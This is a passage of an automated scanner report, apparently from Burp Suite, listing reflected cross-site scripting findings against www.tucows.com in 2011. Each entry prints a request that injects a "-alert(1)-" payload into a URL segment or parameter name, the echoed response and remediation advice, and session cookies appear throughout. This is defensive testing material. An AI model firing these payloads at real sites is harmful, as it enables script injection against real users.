Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes/03BlueMeanyf7990"-alert(1)-"6641f3a44d/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.306. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b53b3"-alert(1)-"2154049023 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes/03BlueMeany/style.cssb53b3"-alert(1)-"2154049023 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.cssb53b3"-alert(1)-"2154049023";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.307. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 329b8"-alert(1)-"ca5ec70f733 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes/03BlueMeany/style.css?329b8"-alert(1)-"ca5ec70f733=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css?329b8"-alert(1)-"ca5ec70f733=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.308. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d20f"-alert(1)-"fab829ca50f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images6d20f"-alert(1)-"fab829ca50f/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images6d20f"-alert(1)-"fab829ca50f/newassets/includes/themes/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.309. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b37a5"-alert(1)-"3c4c9d14a1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetsb37a5"-alert(1)-"3c4c9d14a1d/includes/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetsb37a5"-alert(1)-"3c4c9d14a1d/includes/themes/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.310. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc3ab"-alert(1)-"412e4b918b2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includesdc3ab"-alert(1)-"412e4b918b2/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includesdc3ab"-alert(1)-"412e4b918b2/themes/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.311. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16ea9"-alert(1)-"fa1a0931a13 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes16ea9"-alert(1)-"fa1a0931a13/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes16ea9"-alert(1)-"fa1a0931a13/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.312. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5393"-alert(1)-"cb3cdfe4732 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes/03BlueMeanyd5393"-alert(1)-"cb3cdfe4732/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes/03BlueMeanyd5393"-alert(1)-"cb3cdfe4732/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.313. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6aa0e"-alert(1)-"a1b4df2075b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes/03BlueMeany/styles.css6aa0e"-alert(1)-"a1b4df2075b HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css6aa0e"-alert(1)-"a1b4df2075b";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.314. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acf37"-alert(1)-"829dd6d7186 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes/03BlueMeany/styles.css?acf37"-alert(1)-"829dd6d7186=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css?acf37"-alert(1)-"829dd6d7186=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.315. http://www.tucows.com/images/newassets/javascript:void(null) [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f522"-alert(1)-"246c1c75e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images7f522"-alert(1)-"246c1c75e2/newassets/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images7f522"-alert(1)-"246c1c75e2/newassets/javascript:void(null)";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.316. http://www.tucows.com/images/newassets/javascript:void(null) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3c15"-alert(1)-"6e3e5a56f01 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

